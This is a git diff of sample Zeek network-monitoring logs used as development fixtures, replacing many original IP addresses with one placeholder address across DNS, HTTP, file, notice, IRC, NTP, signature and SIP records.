-{"ts":1617105597.389796,"uid":"CfFSjicQIGB8hU7L6","id.orig_h":"10.156.0.2","id.orig_p":52269,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":7284,"query":"portal.swiftcrypto.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["46.101.87.151"],"TTLs":[119.0],"rejected":false} +{"ts":1617105597.389796,"uid":"CfFSjicQIGB8hU7L6","id.orig_h":"10.156.0.2","id.orig_p":52269,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":7284,"query":"portal.swiftcrypto.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["89.160.20.156"],"TTLs":[119.0],"rejected":false} {"ts":1617105597.761449,"uid":"C86PHA3q1KAtU7gAkb","id.orig_h":"10.156.0.2","id.orig_p":41064,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":46754,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.akadns.net"],"TTLs":[250.0,250.0,250.0],"rejected":false} -{"ts":1617105597.761544,"uid":"Cna5vz1pk7Z32m8HZ6","id.orig_h":"10.156.0.2","id.orig_p":33681,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":53055,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","20.190.159.132","40.126.31.143","20.190.159.134","40.126.31.1","20.190.159.136","40.126.31.135","40.126.31.6","20.190.159.138"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false} +{"ts":1617105597.761544,"uid":"Cna5vz1pk7Z32m8HZ6","id.orig_h":"10.156.0.2","id.orig_p":33681,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":53055,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","89.160.20.156","40.126.31.143","89.160.20.156","40.126.31.1","89.160.20.156","40.126.31.135","40.126.31.6","89.160.20.156"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/files.log b/packages/zeek/_dev/deploy/docker/sample_logs/files.log index 5e431e276c8..950362180ca 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/files.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/files.log @@ -1,8 +1,8 @@ -{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["35.199.178.4"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"} -{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"} -{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"} -{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} -{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} -{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"} +{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"} +{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"} +{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} {"ts":1617069792.519193,"fuid":"FSMkdM3YUSoEVpLZN4","tx_hosts":["169.254.169.254"],"rx_hosts":["10.156.0.2"],"conn_uids":["CgbPEj2jf5Ca7Lw0x2"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5"],"mime_type":"text/html","duration":0.00005316734313964844,"local_orig":false,"is_orig":false,"seen_bytes":1609,"total_bytes":1609,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"1ab1d3a926a99ccfc25acccc5b4289b4","sha1":"1895628784b47ad8da112c699a1b21f5b49c2b80"} -{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} \ No newline at end of file +{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} \ No newline at end of file diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/http.log b/packages/zeek/_dev/deploy/docker/sample_logs/http.log index d31ad75428a..8fd8bce9c52 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/http.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/http.log @@ -1,7 +1,7 @@ -{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} -{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"23.55.163.58","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"52.53.69.85","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]} -{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"89.160.20.156","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} +{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]} +{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/intel.log b/packages/zeek/_dev/deploy/docker/sample_logs/intel.log index ce29b924b0a..b02da37183b 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/intel.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/intel.log @@ -1 +1 @@ -{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"198.41.0.4","id.resp_p":53,"seen.indicator":"198.41.0.4","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]} +{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"89.160.20.156","id.resp_p":53,"seen.indicator":"89.160.20.156","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/irc.log b/packages/zeek/_dev/deploy/docker/sample_logs/irc.log index 70b3b834b2b..9fa9fb8c8b9 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/irc.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/irc.log @@ -1,3 +1,3 @@ -{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "} -{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "} -{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"} +{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "} +{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "} +{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/notice.log b/packages/zeek/_dev/deploy/docker/sample_logs/notice.log index 615f0350d34..16b4052346c 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/notice.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/notice.log @@ -1,4 +1,4 @@ {"ts":1320435875.879278,"note":"SSH::Password_Guessing","msg":"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).","sub":"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136","src":"172.16.238.1","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} -{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"8.42.77.171","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s","sub":"remote","src":"89.160.20.156","dst":"89.160.20.156","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} {"ts":1617097740.958466,"note":"CaptureLoss::Too_Much_Loss","msg":"The capture loss script detected an estimated loss rate above 88.306%","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0} -{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"104.154.89.105","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"104.154.89.105","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0} \ No newline at end of file +{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"89.160.20.156","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"89.160.20.156","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0} \ No newline at end of file diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log b/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log index 9799c888dba..98c494dec42 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log @@ -1,2 +1,2 @@ -{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0} -{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0} +{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0} +{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/signature.log b/packages/zeek/_dev/deploy/docker/sample_logs/signature.log index 4725117d90e..3254e9e084e 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/signature.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/signature.log @@ -1 +1 @@ -{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""} +{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "89.160.20.156","src_port": 51617,"dst_addr": "89.160.20.156","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "89.160.20.156: TCP traffic","sub_msg": ""} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/sip.log b/packages/zeek/_dev/deploy/docker/sample_logs/sip.log index b15b3f6c5ee..60e4d651f42 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/sip.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/sip.log @@ -1,5 +1,5 @@ -{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"74.63.41.218","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} -{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"200.57.7.204","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} -{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"200.57.7.205","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 200.57.7.205:5061;rport"],"response_path":["SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} 